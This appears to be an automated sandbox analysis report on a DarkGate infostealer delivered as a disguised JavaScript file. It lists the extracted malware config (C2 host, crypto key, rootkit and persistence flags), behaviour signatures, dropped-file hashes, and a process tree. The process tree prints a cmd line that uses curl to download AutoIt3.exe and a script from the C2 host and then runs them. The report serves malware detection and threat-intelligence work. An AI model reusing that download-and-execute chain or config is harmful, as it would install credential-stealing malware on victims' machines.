Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-10-2023 19:37

General

  • Target

    Redefining_Our_Structural_Canvas_2023_Confidential.js

  • Size

    50KB

  • MD5

    6e0b712bbd5e1a3ee9eb2098cadf0a90

  • SHA1

    53697a5a284e0584181e3c3d4303cded6e58f2f2

  • SHA256

    ac61469d96805f9590d80397ed8fca735b718c000026ff5d99672c791d4707b7

  • SHA512

    55d1197aba1a398719a0d33c16ed25f757f4f6d4ea11a3870ebbd96ae3530e1064e3885f0ad8cbfd540829e989abc9ac463d5ed36044af4db5ee1b3fce8a41d9

  • SSDEEP

    768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3WSLbsX6:nAIMFFdYMxAcEQDn

Score
10/10

Malware Config

Extracted

Family

darkgate

Botnet

Ricoc3

C2

http://hgfdytrywq.com

Attributes
  • alternative_c2_port

    8080

  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_rawstub

    true

  • crypto_key

    hpBBFgfpMQrScI

  • internal_mutex

    txtMut

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    4

  • rootkit

    true

  • startup_persistence

    true

  • username

    Ricoc3

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3784
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
        PID:3704
      • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
        "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
        1⤵
          PID:2976
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
            PID:3880
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            1⤵
              PID:3488
            • C:\Windows\system32\taskhostw.exe
              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
              1⤵
                PID:2556
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                1⤵
                  PID:2472
                • C:\Windows\system32\sihost.exe
                  sihost.exe
                  1⤵
                    PID:2428
                  • C:\Windows\system32\wscript.exe
                    wscript.exe C:\Users\Admin\AppData\Local\Temp\Redefining_Our_Structural_Canvas_2023_Confidential.js
                    1⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:5028
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o jgeyvf.au3 http://hgfdytrywq.com:80/msizpmaofse & Autoit3.exe jgeyvf.au3
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4584
                      • C:\Windows\system32\curl.exe
                        curl -o Autoit3.exe http://hgfdytrywq.com:80
                        3⤵
                          PID:1708
                        • C:\Windows\system32\curl.exe
                          curl -o jgeyvf.au3 http://hgfdytrywq.com:80/msizpmaofse
                          3⤵
                            PID:1364
                          • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
                            Autoit3.exe jgeyvf.au3
                            3⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Checks processor information in registry
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:4264
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ping 127.0.0.1
                              4⤵
                                PID:2824
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c ping 127.0.0.1
                                4⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Blocklisted process makes network request
                                • Drops startup file
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: GetForegroundWindowSpam
                                PID:1108

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\hddefdf\Autoit3.exe

                          Filesize

                          872KB

                          MD5

                          c56b5f0201a3b3de53e561fe76912bfd

                          SHA1

                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                          SHA256

                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                          SHA512

                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                        • C:\ProgramData\hddefdf\cbdagae\edbcbkf

                          Filesize

                          166B

                          MD5

                          24a3a683f752cc1d4647cfde42e22494

                          SHA1

                          142e16623b7f9aec5e04d82bde7e6d559d4d515f

                          SHA256

                          1734f4dbba841ac056d9f65e734166e98149ec9315ec8d93e9a44f42aa0250d2

                          SHA512

                          27b5bf944788a20fb75bd83a799741b43bac6f12f64e4cc942b2b5b39ca2a473244a326d67f7a920e5b04d91c9fbccdd841c2becb572bbb3d6a42a3ec0a8224e

                        • C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

                          Filesize

                          872KB

                          MD5

                          c56b5f0201a3b3de53e561fe76912bfd

                          SHA1

                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                          SHA256

                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                          SHA512

                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                        • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

                          Filesize

                          872KB

                          MD5

                          c56b5f0201a3b3de53e561fe76912bfd

                          SHA1

                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                          SHA256

                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                          SHA512

                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                        • C:\Users\Admin\AppData\Local\Temp\jgeyvf.au3

                          Filesize

                          487KB

                          MD5

                          4c5474759bd10c4fd072e73ae027b733

                          SHA1

                          6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

                          SHA256

                          be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

                          SHA512

                          b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

                        • \??\c:\temp\eaghaek.au3

                          Filesize

                          487KB

                          MD5

                          4c5474759bd10c4fd072e73ae027b733

                          SHA1

                          6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

                          SHA256

                          be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

                          SHA512

                          b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

                        • memory/1108-55-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-31-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-57-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-92-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-58-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-89-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-25-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-23-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-29-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-30-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-59-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-21-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-38-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-39-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-40-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-42-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-43-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-44-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-45-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-46-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-47-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-48-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-49-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-50-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-51-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-52-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-53-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-54-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-20-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-56-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-88-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-90-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-87-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-60-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-61-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-62-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-64-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-63-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-65-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-66-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-67-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-68-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-69-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-72-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-71-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-73-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-74-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-76-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-75-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-77-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-81-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-80-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-82-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-84-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-85-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1108-86-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/4264-6-0x00000000010E0000-0x00000000014E0000-memory.dmp

                          Filesize

                          4.0MB

                        • memory/4264-17-0x0000000004220000-0x0000000004552000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/4264-18-0x0000000004220000-0x0000000004552000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/4264-16-0x0000000004220000-0x0000000004552000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/4264-15-0x0000000004220000-0x0000000004552000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/4264-7-0x0000000004220000-0x0000000004552000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/4264-19-0x00000000010E0000-0x00000000014E0000-memory.dmp

                          Filesize

                          4.0MB

                        • memory/4264-22-0x0000000004220000-0x0000000004552000-memory.dmp

                          Filesize

                          3.2MB